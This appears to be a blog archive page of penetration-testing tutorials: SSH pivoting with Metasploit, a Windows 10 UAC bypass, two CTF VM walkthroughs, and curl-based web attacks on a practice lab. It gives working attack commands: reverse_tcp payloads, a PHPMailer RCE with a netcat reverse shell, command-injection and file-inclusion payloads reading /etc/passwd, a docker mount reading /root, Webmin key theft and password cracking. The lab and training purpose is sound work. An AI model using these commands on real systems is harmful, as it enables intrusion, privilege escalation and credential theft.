Showing posts with label Penetration Testing. Show all posts
Showing posts with label Penetration Testing. Show all posts

SSH Pivoting using Meterpreter

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack


This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username raj
msf auxiliary(ssh_login) > set password 123
msf auxiliary(ssh_login) > exploit


From given image you we can observe that command shell session 1 opened


Now convert command shell into meterpreter shell through following command
Session –u 1
From given image you can observe that Meterpreter session 2 opened

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for meterpreter shell of SSH server.


Check network interface using ifconfig command
From given image you can observe two network interface in victim’s system 1st for IP 192.168.0.109 through which attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.10.0
msf post(autoroute) > set session 2
msf post(autoroute) > exploit


This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.10.2
msf auxiliary(ssh_login) > set username ignite
msf auxiliary(ssh_login) > set password 1234
msf auxiliary(ssh_login) > exploit

From given image you can see another command shell 3opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

Sessions

1.       Command shell for SSH raj (192.168.0.109:22)
2.       Meterpreter shell for SSH raj (192.168.0.109)
3.       Command shell for SSH ignite (192.168.10.2:22)


Sessions 3
Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.
Ifconfig
From given you can observe the network IP is 192.168.10.2

Pivoting is Dangerous but enjoyable network attack J

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux
Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid
getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.


To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.


Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.


This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem
getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Hack the Donkey Docker (CTF Challenge)

Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.
The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

Netdiscover


Use nmap command for port enumeration
nmap -sV 192.168.1.120
As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser.

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.


Now open the terminal in kali Linux and type following command:
From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.
 So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer
http://192.168.1.120/mailer/VERSION
We got the version of PHPMailer i.e. 5.2.16.
From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.


 After Downloading the Python File and make following changes:
1.      Open the file and add “# coding: utf-8” at the beginning.
2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
4.      After making above changes save it.After Downloading the Python File and make following changes:
1.      Open the file and add “# coding: utf-8” at the beginning.
2.      Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
3.      Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
4.      After making above changes save it.
Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.
nc –lvp 4444
Before you run the python script, type following command in a new terminal which will install the exploit dependency.
Pip2 install requests_toolbelt
Now run the script in order to exploit the target as shown in given image.
python 40974.py
Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.
python -c 'import pty; pty.spawn("/bin/bash")'

Once you got the victim shell type following commands for finding hidden flag.
Ls
Cat main.sh
Here we found user smith which is a directory has flag.txt let approach toward this directory.
Cd home
Ls
While again opening smith directory, we got Permission denied.
Then we used su smith to instead of sudo, because sudo is not accessible in this shell
Su smith
For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag
Ls
Cd /home/smith
Ls
Flag.txt
Cat flag.xt

Grate!! Successfully capture 1st flag
Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2nd flag inside it.

Type following command to view all directory list
Ls-al
We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one
Cat authorized_keys
Cat id_ed25519
Cat id_ed25519.pub
In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.
Now using ssh login by
Ssh –I id_rsaorwell@192.168.1.120
Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2nd flag
Ls
Flag.txt
Cat flag.xt

Nice!! Successfully got 2nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3rd flag.
Type following command
docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’
This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:
docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’  
Awesome we got 3rd flag also.

Web Application Penetration Testing with cURL

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

·         CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS,  IMAP, IMAPS,  LDAP,  LDAPS,  POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.
·         Can be used inside your shell scripts with ease
·         Supports features like pause and resume of downloads
·         It has around 120 command line options for various tasks
·         It runs on all major operating systems(More than 40+ Operating systems)
·         Supports cookies, forms and SSL
·         Both curl command line tool and libcurl library are open source, so they can be used in any of your programs
·         It supports configuration files
·         Multiple upload with a single command
·         Progress bar, rate limiting, and download time details
·         IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.


Let’s begin!!



Command Injection Exploitation
You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”


From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.


Download File from URL
Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.
Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe


HTTP Headers
Curl is use for identify HTTP method which helps in http verb tempering, type following command:
Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.


File Inclusion
This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it
Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd


Hence you can observe that we found data from inside etc/passwd


HTTP Authentication
HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you're allowed to send the request you're sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php


If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.


File Upload
Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook.  Use curl command to upload the putty.exe file on targeted system.
Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php


Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.


Open above given directory in browser as 192.168.0.16/upload/images/

Awesome! From given below you can see putty.exe is uploaded


Hack the d0not5top VM (CTF Challenge)

This time we are going to solve a fun Vulnerable Lab d0not5top 1.2. To do so we are going to download the VM Machine from here.
The credit for developing this VM machine is goes to 3mrgnc3 who has hidden 7 flags inside this lab as a challenge for hackers.

Let’s Breach!!!
As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.113 but you will have to find your own)

netdiscover


Next we run nmap
nmap -sV 192.168.1.113


Now, visit the IP in the Browser.

Since we  didn’t found something interesting when explore its IP in browser therefore now I am going to scan the Web Content by using dirb in kali linux.

dirb http://192.168.1.113


As you can observe from above image I had highlighted a URL which indicates toward the control panel of website lets open 192.168.1.113/control in the Browser. Yes it is DNS control panel but I didn’t found any clue for 1st flag on this web page.


After that move towards its view source page and notice FL46_1 which indicate it is the 1st flag.

Wonderful!! Successfully found 1st flag


From the scanning result of dirb we found so many web directories in this machine therefore further I choose 192.168.1.113/control/js Directory. In this I found a File README.MadBro. It will open as shown below.

Now here we found a Binary code which is to be converted into Decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.


Now, for third flag, we will use netcat very verbrose mode on port 25 which hosts smtpd service (This can be found by doing an aggressive nmap scan on the IP)
nc –vv 192.168.1.113 25
Here we found a Hexadecimal code which is to be converted in Text. 


Great!! Successfully get 3nd Flag also.


On the url on which we found Second Flag, There is an instruction written in Leet, It reads : M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in given image.

Now open donot5topme.ctf in the browser as shown and Click on Register given at the end of web page.


As you can observe that we didn’t found any clue on this web page therefore open view source page.



At View Page Source, here we found this link as shown in highlighted text.


Some kind of encoded web page is open then I search in google related to this encoding. It is known as brain fuck encoding.

So we will decrypt it. Here we got the FL46_4

Successfully found 4th flag


Now move back to the d0not5topme.ctf. Now we will click on Register and Then on I agree to these terms and we will get to Registration Page. Here we click on Board Administration, which opens a prompt which asks for the client to open mailto link, here I choose Gmail.


Here I found another domain name “Megusta@G4M35.ctf



Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.


Before, I  open this domain in browser, Here I got a game to play, although you can get the next clue by playing too, but I  thought of a more technical approach and open this webpage and with Inspect Element. Now select the Debugger Tab. Here I found game.js and inside the Game_Over script I found the next clue as “/H3X6L4m3


Now opened the complete link “g4m35.ctf/H3X6L4m3” , it gave another new game.


Again we can play and discover the next clue/flag. But we went to get a bit technical approach and ran a dirb command to look after its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.


Now I had open this Texture directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.


Now open this image and get the octal code.


When decode this code I found FL46_5
I had Captured 5th flag also!!


Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another ctf “t3rmln4l.ctf” as shown below.


Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save


Now as before, when opening this domain in browser, I got a Terminal which asks for password. After trying a bunch of commands, I found grep* runs on this terminal and for authentication I entered the name of ctf as password i.et3rm1a4l.ctf and found another ctf “M36u574.ctf”.


Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.


Now as before, you will open this domain in browser, you will get a slideshow of Megusta images. Out of different images I have download the kingmegusta.jpg.


Now we will run exiftool on this image, here I got some code in Comment as shown below.


Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.


Then I had created a text file on /root/Desktop name anything you want and Paste the above decoded text in this file.


Now run John The Ripper, using this file as shown
john --wordlist=/usr/share/wordlists/rockyou.txt donotstop
Here I found a user MeGustaKing and Password ********** (10 times *).


Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.


Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.


Great! It is the 6th Flag.


As mentioned above in the previous ssh login we got this username burtieo and its password is the text written above it i.e. Lets you update your FunNotes and more!
Now let’s login in ssh using combination
Username : burtieo and Password : Lets you update your FunNotes and more!


This opens rbash shell and rbash shell restricts some of the features of bash shell.


So, firstly run following command
suedoh –l
And then we run the command
suedoh /usr/bin/wmstrt


Using nmap command I found up the port 10000 open.


But this port only remains open for 20 seconds, we can make it stay open for long using “for loop” as shown.


Now let’s run metasploit and use the exploit named file_disclosure

msf> use auxiliary/admin/webmin/file_disclosure
msf> auxiliary (file_disclosure) > set lhost 192.168.1.113
msf> auxiliary (file_disclosure) > set ssl true
msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa
msf> auxiliary (file_disclosure) > exploit

I found the RSA Private Key as shown.

Now Copy and Paste this Private Key in a file and name it id_rsa and then Run John The Ripper.
ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite
This has given the root password .i.e. “gustateamo


Now I have removed permissions from id_rsa by chmod 700 and login into ssh as root with password gustateamo as shown below.


Now type following command
ls
You can observe from given image it consist two file let open one of them
cat L45T_fl46.pl
Here it gave the message to use L45T_fl46.pl


Now use netcat command to establish connection with target through port 1234.
nc –lp 1234 –vv


Now in D0Not5top terminal we will open file L45T_fl46.pl with IP 192.168.0.7 (Kali Linux IP) as given below:
./ L45T_fl46.pl 192.168.0.7 1234


On attacker system it will you will found get netcat connect with targeted system. The highlighted text is indicating toward FL46_7
Congratulations!! It is the 7th Flag.
Solving this lab was a fun and learning experience.